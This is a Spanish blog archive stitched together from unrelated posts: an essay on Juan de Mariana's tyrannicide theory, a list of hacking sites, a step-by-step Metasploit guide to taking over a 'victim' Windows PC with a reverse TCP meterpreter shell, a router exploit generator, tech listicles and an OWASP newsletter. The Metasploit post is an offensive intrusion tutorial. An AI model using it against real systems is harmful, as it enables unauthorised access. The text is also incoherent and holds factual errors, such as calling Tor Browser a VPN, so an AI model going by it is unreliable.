martes, 30 de junio de 2020

La Teoría Del Tiranicidio Según El Padre Jesuita Juan De Mariana

Juan de Mariana [Talavera de la Reina (Toledo), 1536 − Toledo, 1624] fue un destacado teólogo jesuita, historiador y filósofo español que, en 1599, publicó su polémico libro De Rege et regis institutione en el que analizó, entre otras cuestiones que pretendían ayudar en la educación del rey Felipe III, cuáles eran el origen, los límites y el carácter del poder monárquico, las ventajas y desventajas de las distintas formas de gobierno y, por lo que a nosotros se refiere, su opinión sobre el tiranicidio. Un criterio muy personal que estuvo condicionado por los acontecimientos que el propio autor vivió en París durante la peor época de intolerancia religiosa que padeció Francia a finales del siglo XVI, la matanza de San Bartolomé, mientras impartía clases en el Colegio de Cleremont. Como recuerda Rogelio Fernández Delgado (*): En un principio esta obra no tuvo problemas con la censura y fue recibida sin causar mucha expectación. Escrito en latín, con el tiempo se convirtió en uno de los libros más polémicos e incluso más escandalosos que circulaban por Europa porque se elogiaba el asesinato en 1589 del rey de Francia Enrique III. El 14 de mayo de 1610 fue asesinado su sucesor Enrique IV por el monje Ravillac, hecho por el que los enemigos de la Compañía de Jesús lanzaron el rumor de que el regicida había leído el libro del padre Mariana, lectura que no había tenido lugar según se demostró durante el proceso al que fue sometido el monje tiranicida. No obstante, la obra fue condenada por la Sorbona, y el 8 de junio de 1610 el Parlamento de París acordó que De Rege et regis institutione fuera quemado públicamente, como así se hizo en el atrio de la catedral de París.

¿Cuál era la "Teoría del Tiranicidio" que sostuvo de Mariana para que su obra fuese condenada y quemada en Francia? Así lo narra en su obra:

(…) Enrique III, rey de Francia, fue muerto por la mano de un monje con las entrañas atravesadas por un puñal envenenado. Lamentable espectáculo que en pocos casos será digno de elogio, pero en el que los príncipes pueden comprender que no pueden quedar impunes sus audaces e impías maldades. La potestad del príncipe es muy débil cuando pierde el respeto de sus vasallos. El rey Enrique, que carecía de descendencia, intentaba dejar el reino a su cuñado Enrique, que desde su más tierna edad se hallaba embebido en las más erróneas opiniones religiosas y había sido condenado por los pontífices y privado de su derecho de sucesión, aunque ahora, que ha cambiado de pensamiento, es rey de Francia. Por esta razón, gran parte de la nobleza, de acuerdo con otros príncipes, tanto franceses como de otros países, se había alzado en armas para defender la patria y la religión, y había recibido de todas partes socorros y auxilios. Guisa, en cuyo valor estaban puestas las esperanzas y el destino de Francia, en esta tormenta se puso a la cabeza de este movimiento.

Los reyes rara vez cambian de propósito. Y así, Enrique, para oponerse y vengarse de los nobles, llamó a Guisa a París con el propósito indudable de asesinarlo. Y como fracasara su propósito, porque el pueblo enfurecido se alzó en armas, abandonó precipitadamente la ciudad. Pasado algún tiempo, simuló haber cambiado de pensamiento, y anuncia públicamente que quiere deliberar con todos los ciudadanos sobre lo que conviene al bienestar público. Reunidos todos los estamentos del Estado en Blesis [Blois], junto a las aguas del Loira, mató en el mismo palacio real a Guisa y a su hermano, el cardenal, que habían asistido a la asamblea confiados en la palabra del rey. Y después, tratando de cubrir el hecho con una capa de derecho, una vez asesinados, manifiesta que son reos de crímenes de lesa majestad, acusándolos, cuando ya no podían defenderse, de alta traición. Además prende a otros muchos, y entre ellos al cardenal de Borbón, que, aunque de edad muy avanzada, era el sucesor legítimo de Enrique por derecho de sangre. e este movimiento.

Con estos sucesos se conmovieron profundamente los ánimos de gran parte de Francia y se rebelaron muchas ciudades exigiendo la abdicación de Enrique por razón del bien público. Y entre ellas, París (…). Cuando se aquietaba el impulso del pueblo y Enrique estaba acampado a unas cuatro millas de París, no sin esperanza de vengarse de la ciudad, y parecía ya que las cosas no tenias remedio, la audacia de un joven volvió a levantar los ánimos. Este joven se llamaba Jacobo Clemente [en francés: Jacques Clément] y era natural de la aldea de Autun conocida como Sorbona y estaba a la sazón estudiando teología en un colegio de los dominicos. Y como hubiera sabido por los teólogos con que cursaba sus estudios que era lícito matar a un tirano, se hizo de varias cartas de los que pública o secretamente eran partidarios de Enrique, y sin tomar consejo de nadie partió hacia el campamento del rey con el propósito de matarlo el 31 de julio de 1589. Creyendo que iba a comunicar al rey secretos importantes, por las cartas que había presentado, se le recibió sin demora y se le citó al día siguiente. Y en efecto, el día primero de agosto, día de San Pedro ad Víncula, una vez celebrada la misa, pudo visitar al rey, que le recibió apenas levantado del lecho y a medio vestir. Después de cambiadas algunas palabras, cuando estuvo próximo al rey, so pretexto de entregarle en mano otras cartas, con un puñal envenenado que ocultaba en la misma mano, lo hirió en la vejiga. ¡Serenidad insigne, hazaña memorable! Traspasado el rey de dolor, hirió con el mismo puñal a su asesino en el pecho y en el ojo, al mismo tiempo que gritaba: "Al traidor, al parricida".

Los cortesanos, conmovidos por suceso tan inesperado, irrumpieron en la cámara del rey y acuchillaron con crueldad y fiereza a Clemente, que ya estaba postrado y exánime. Este no pronunció una sola palabra y más bien mostraba un semblante sereno, porque así evitaba otros tormentos que recelaba que sus fuerzas no podían soportar. Y entre los golpes y las heridas su rostro revelaba la alegría de haber redimido con su sangre la libertad de sus conciudadanos y de su patria. Enrique III de Francia acabó muriendo por una peritonitis el 2 de agosto de 1589.

(…) Sobre la acción del monje no todos opinaron de la misma manera. Muchos la alabaron y lo juzgaron digno de la inmortalidad; otros más prudentes y eruditos, negaron que un particular, por su autoridad privada, pudiere matar a un rey que había sido proclamado por el consentimiento del pueblo, proclamado por el pueblo y ungido y consagrado, según es costumbre, por el óleo santo, aunque las costumbres de este rey se hayan corrompido y haya degenerado su poder en tiranía.

Después de enumerar diversos ejemplos de tiranos que gobernaron el mundo antiguo, el autor reflexiona si: (…) A la vista de tantos y tan terribles ejemplos, creen algunos que debe sufrirse al príncipe reinante, sea justo o injusto, y atenuar con la obediencia los rigores de su tiranía. (…) ¿Qué respeto podrán tener los pueblos a su príncipe (respeto en el que se funda la autoridad) si se les persuade de que pueden castigar las faltas que cometa el rey? Por motivos verdaderos o por motivos aparentes, se turbará a cada paso el más precioso don del Estado, la tranquilidad pública. En su opinión: Se debe proceder con mesura y por grados. Primero se debe amonestar al príncipe y llamarle razón y derecho. Y si se aviniera a razones, si satisficiere los deseos de la nación, si se mostrase dispuesto a corregir sus faltas, no hay para qué pasar más allá ni intentar remedios más amargos. Si, por el contrario, rechazara todo género de observaciones, si no dejara lugar alguno a la esperanza, debe empezarse por declarar públicamente que no se le reconoce como rey. Y como esta declaración provocará necesariamente una guerra, conviene preparar los medios para defenderse, procurarse armas, imponer contribuciones a los pueblos para los gastos de la guerra, y si fuera necesario y no hubiera otro modo posible de salvar la patria, matar al príncipe como enemigo público, con la autoridad legítima del derecho de defensa [DE MARIANA, J. La dignidad real y la educación del rey (De rege et regis institutione). Madrid: Centro de Estudios Constitucionales, 1981, pp. 70 a 80].

PD: el argumentario del jesuita español –más religioso que jurídico o político– fue fruto de la intolerancia en materia de creencias que caracterizó a la Europa de finales del siglo XVI y, en especial, a Francia, a pesar de su Edicto de Nantes; sin embargo, el debate sobre la legitimidad de cometer un tiranicidio surgió en la Antigüedad, con autores como Cicerón, Séneca o Plutarco; y se desarrolló en la Edad Media con las obras del obispo de Chartres (Juan de Salisbury) o santo Tomás de Aquino, por el lado católico; y el libro Vindiciae contra tyrannos, de un hugonote anónimo.

Pinacografía: Charles-Gustave Housez | Asesinato de Enrique IV de Francia y detención de François Ravaillac el 14 de mayo de 1610 (1860). Charles Durupt | Enrique III de Francia poniendo el pie sobre el cadáver de Guisa (1832). Anónimo | Grabado sobre Jacques Clément (s. XVI). 
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Top 11 Best Websites To Learn Ethical Hacking

  • NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
  • SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
  • Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  • The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  • Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
  • Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
  • KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
  • HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  • Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  • Phrack Magazine: Digital hacking magazine.
  • Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.

lunes, 29 de junio de 2020

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viernes, 19 de junio de 2020

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jueves, 11 de junio de 2020


Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.



Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim


Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. using the command "set LHOST".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
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The Cryptography is derived from the Greek words "Kryptos". This is the study of secure communication techniques that allow only the sender and recipient of a message to view it's contents of transforming information into nonhuman readable form or vice versa is called cryptography.

As we know that information plays a vital role in running of any business and organizations etc, sensitive details in the wrong hands can leads to loss of business.

Cryptography is the science of ciphering and deciphering messages.To secure communication organizations use cryptology to cipher information .


Cryptography is a method of protecting information and communication through the use of codes so that only those whom the information is intended can read and process it.

In Computer Science, Cryptography refers to secure information and communication techniques derived from mathematical concepts , a set of rule based calculations called algorithm to transform message in ways the hard to readable for human.

This is one of the secure way of communications for a hacker with the help of virtual private network(VPN) like Tor Browser which is also very helpful to change the IP Address(Location of the sender ) for illegal purpose to perform crime in cyberspace . I will discuss in brief about the VPN .

How to Encrypt and Decrypt the text in Cryptography?

Open this website with the help of internert surfing for encryption-"" 

Open the link for Decrypt the code text-""

Type whatever you want for encryption and it will crypt in the code form, copy that code and forward to the intended person whom you want for secure communication and then he/she will Decrypt in the real form.


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Top 5 Most Useful Linux Tools For Programmers

Top 5 most useful linux tools for Programmer

Linux is a free and open-source software operating systems built around the Linux kernel. It typically packaged in a form known as a Linux distribution for both desktop and server use. It is a great development environment for programmers and developers. However, without the development tools, that would be impossible. Fortunately, plenty of Linux tools are available. Here are the top 5 most useful Linux tools for programmers.

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5 Most Useful Linux tools for Programmers

1. VIM

vim editor-compressed
VIM is a free and open source software written by Bram Moolenaar in 1991. It is designed for use both from a command-line interface and as a standalone application in a graphical user interface. It comes standard with almost every Linux distribution and is also known as "the programmer's editor". VIM is great for coding and can also be used for editing things like configuration files and XML documents.
Vim has been developed to be a cross-platform that supports many other platforms. In 2006, it was voted as the most popular editor amongst Linux Journal readers. In 2015, Stack Overflow developer survey found it to be the third most popular text editor while in 2016, the Stack Overflow developer survey found it to be the fourth most popular development environment.
Read more;-  How To Use WhatsApp without Mobile No

2. Zsh

Zsh is written in C and initially released in 1990. It is a Unix shell that can be used as an interactive login shell and as a powerful command interpreter for shell scripting. Zsh is an extended version of Bourne shell (BASH) with a large number of improvements, including some features of Bash, ksh, and tcsh. Zsh gives a user-friendly experience on the command line. It also gives better auto-completion, Vim key bindings, and smart guesses when you write a command wrong.
Its features include (but not limited to):
  • Programmable command-line completion,
  • Sharing of command history among all running shells
  • Extended file globbing
  • Improved variable/array handling
  • Editing of multi-line commands in a single buffer
  • Spelling correction
  • Various compatibility modes,
  • Themeable prompts, and
  • Loadable modules.

3. Byobu

It was initially released in 2009 written in Sh and Python. Byobu can be used to provide on-screen notification or status and tabbed multi-window management. Thus, it is intended to improve terminal sessions when users connect to remote servers with an operating system Linux and Unix-like. It is is an enhancement for the GNU Screen terminal multiplexer or tmux used with the GNU/Linux computer operating system.

4. GIT

git commandsGit was initially released on April 7, 2005. It is a version control system to track changes in computer files and to coordinate work on those files among multiple people. It is primarily used for source code management in software development and can be used to keep track of changes in any set of files available in the English language. It is aimed at speed, data integrity, and support for distributed, non-linear workflows. It is free and open source software distributed under the terms of the GNU General Public License version 2.
Moreover, Linus Torvalds was the creator of GIT for the development of the Linux kernel. On the other hand, its current maintainer since then is Junio Hamano. Thus, every Git directory on every computer is a full-fledged repository with complete history and full version tracking abilities, independent of network access or a central server.

5. Docker

Written by Solomon Hykes in 2013, it is a computer program that performs operating-system-level virtualization, the containerization, which is developed by Docker, Inc. Primarily, Docker was developed for Linux to use as the resource isolation features of the Linux kernel. It is a tool that can package an application and its dependencies in a virtual container that can run on any Linux server. This helps enable the flexibility and portability on where the application can run, whether on premises, public cloud, private cloud, bare metal, etc.  Moreover, it accesses the Linux kernel's virtualization features either directly using the libcontainer library.

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  9. Hacking Resources

miércoles, 10 de junio de 2020

Router-Exploit-Shovel: An Automated Application Generator For Stack Overflow Types On Wireless Routers

About Router-Exploit-Shovel
   Router-Exploit-Shovel is an automated application generation for Stack Overflow types on Wireless Routers.

   Router exploits shovel is an automated application generation tool for stack overflow types on wireless routers. The tool implements the key functions of exploits, it can adapt to the length of the data padding on the stack, generate the ROP chain, generate the encoded shellcode, and finally assemble them into a complete attack code. The user only needs to attach the attack code to the overflow location of the POC to complete the Exploit of the remote code execution.

   The tool supports MIPSel and MIPSeb.Run on Ubuntu 16.04 64bit.

Router-Exploit-Shovel's Installation
   Open your Terminal and enter these commands:

   Example: python3 -b test_binaries/mipseb-httpd -l test_binaries/ -o 0x00478584

Router-Exploit-Shovel's screenshot

Code structure

ROP chain generation
   This tool uses pattern to generate ROP chains. Extract patterns from common ROP exploitation procedure. Use regex matching to find available gadgets to fill up chain strings. Base64 encoding is to avoid duplicate character escapes. For example:

   You can get attackblocks generated in results/attackBlocks.txt. Such as:

You might like these similar tools:

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November 2019 Connector

November 2019


Letter from the Vice-Chairman

Dear OWASP Community, 

Preparation for next year's conferences is underway. I had the pleasure of meeting people from our community at a recent ISACA Ireland event where I had an OWASP stand. I also had lots of swag to give away, loads left which I plan to share out amongst the community. 

I was on a call recently with both WIA leadership and a number of individuals looking to broaden our diversity reach, forming DIA (diversity in AppSec). This was a positive call and I look forward to reviewing their proposal under the committee 2.0 operating model.

I'd like to thank our volunteers, chapter and project leaders for making OWASP what it is today. We wouldn't have a foundation without you. We always want to make things better, to this end, it would be great if you could fill out the following feedback form.

Thank you, 
Owen Pendlebury, Vice-Chairman


As we wind down 2019, we are planning lots of new opportunities to get involved with OWASP next year. The current working draft of the 2020 Operating Plan can be found on our staging site for our new website which is planned to launch next month.
Some of the highlights for 2020:
  • Quarterly Town Hall meetings.
  • Two Project Summits - the first in February 2020
  • Pilot single-day AppSec Days worldwide to offer local training and community.
We are also set to further increase the transparency of the daily workings of OWASP through our Staff Projects page. The pages linked there will always be a work in progress; some of which today are still only templates but still a great resource to know what's going on at OWASP.

All of this which adds to our Global and Regional Events, ongoing local chapter support, and other member activities. Our plans are ambitious and we look forward to your continued support this and every month as we look to better secure the web.

OWASP Foundation Global AppSec Event Dates for 2020

Global AppSec Dublin, June 15 - 19, 2020
(Formerly known as AppSec EU)
Sponsorship is now available
Call for Papers & Call for Training December 2019
Global AppSec San Francisco, October 19 - 23, 2020
(Formerly known as AppSec US)
CFP &  CFT February 2020

** Visit our website for future announcements.**
NEW OWASP Project Summit - Winter 2020
February 2020 in Cancun, Mexico

The OWASP Foundation will host a three-day working session for FIVE selected projects in Cancun, Mexico, February 2020. Arrival day will be Wednesday the 19th and departures will be the 23rd. Projects must apply and then get selected to participate. The application process will require project meeting goals, work plans, key contributors, and expected attendance. The OWASP Foundation Officers Group will make the final selection. For more information click here

You can also email Emily Berman Global Events Director or Harold Blankenship Director of Technology and Projects.
Announcing a New Opportunity to become part of a Global AppSec Program Team
Conference Program Teams are constituted for each Global AppSec event and consists of members of OWASP members and staff. The selection of team members is based on subject-matter expertise and a balanced representation of the OWASP community. For planning purposes, team members shall reside on the continent of the Global AppSec for which they serve. Teams are constituted no later than six months prior to the Global AppSec event.

To apply to become a member of the Conference Program Team click here.

We are so excited to announce that both the London OWASP and WIA community have been asked to speak at BlackHat Europe 2019 on Wednesday 4 December at the EXCEL London.   Andra Lezza is leading the panel of women to "Share insights gained at different stages of their careers to help other women in the field."  Thank you, Andra, for leading the initiative and also to Sonya Moisset, Bibi Sanjarani, Katy Anton and Lauren Chiesa for volunteering to be part of the panel.  Also from the OWASP Community and a London Chapter Leader Sam Stepanyan and Paul Harragan.  Sam and Pau will be presenting a more in-depth demo on the OWASP Nettacker.  Good luck to all the speakers have a great conference.

I would like to encourage all of the OWASP community that will be attending BlackHat Europe to please make every effort to attend and support our fellow OWASP members Wednesday, 4 December 2019. (Click to view the schedule details.)

OWASP Members don't forget you are eligible for € 200.00 discount, email for code to use when registering.

BlackHat Europe has extended an invitation to our London WIA community  to  lead a panel to "Share insights gained at different stages of their careers that could help other women in the field."  Thank you to Andra Lezza for leading this initiative and Sonya Moisset, Bibi Sanjarani, Katy Anton and Lauren Chiesa for volunteering to be part of the panel and to contribute.  Good luck I am sure your session will be a huge success.

BlackHat Europe 2019 London at EXCEL London
2019 December 2-5 
The OWASP Booth 1015
Business Hall December 4 & 5 
December 4, 10:30 AM - 7:00 PM
December 5: 10:00 AM - 4:00 PM


You may also be interested in one of our other affiliated events:

Event DateLocation
German OWASP Day 2019 December 10, 2019 Karlsruhe, Germany
AppSec California 2020 January 21 - 24, 2020 Santa Monica, CA
OWASP New Zealand Day 2020 February 20 - 21, 2020 Auckland, New Zealand
OWASP Seasides March 3 - 5, 2020 Panjim Goa, India
SnowFROC 2020 March 5, 2020 Denver, CO
AppSec Morocco & Africa 2020 June 4 - 5, 2020 Rabat, Morocco

Event Date Location
BlackHat Europe 2019 December 2 - 5, 2019 London


As the foundation moves toward the migration of the OWASP web presence from the old wiki site to our new Github-hosted home, some of you may still have questions regarding what to move and how to move it. Essentially, if you have a chapter page or project page and you have not migrated it to the new website, that would be first. Steps on what to do and what is needed can be found at There are also some minor instructions on the default project or chapter page itself. And if you are wondering where that page is located, you can go to and type your chapter name in the repository search bar. If your project or chapter is not there, contact me. Lastly, there are a number of excellent examples already done by other leaders (also linked on the migration page).

And, as a precaution, you should click over into the 'Settings' of your repository and then click the 'Collaborators & teams' link on the left menu and check to make sure that the usernames added to Collaborators match what you expect.  Having someone you do not know edit your web page without your knowledge is no longer the expected behavior.

Some resources, mostly for projects, have been uploaded to the OWASP Site Theme Repository and can be linked to via the /assets/image/common/<file> URL.

After your chapter or project page is done, there is a www-community repository which would include any files from the wiki that are not currently in a project or chapter or board/staff policy area.  For instance, there are pages there for GSoC and XSS and CSRF.  A list of the top pages that need to be migrated can be found attached to one of the TODO cards on our website migration Trello board which you are invited to join if you want to help migrate loose pages and/or perform some automation work.

Our current plan can be found on the Website Relaunch project page.


As part of OWASP's participation in Google's Season of Docs, the ZAP project has had Nirojan Selvanathan (@sshniro)  working on API documentation.  The first iteration of the documentation is now live.  It includes Java, Python, and shell
example snippets all presented in a responsive and accessible design which we will continue to build on in the future.

Big thanks to Nirojan for his efforts on this wonderful initiative!
Congratulations and thanks to Google Open Source for helping to bring the open-source and technical writer communities together!


Welcome to our New OWASP Chapters

Colombo, Sri Lanka
Des Moines, IA
Harrisburg, PA
Louisville, KY
Monterrey, Brazil
Moscow, Russia

Contributor Corporate Members

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OWASP Foundation 
1200-C Agora Drive, #232
Bel Air, MD 21014  
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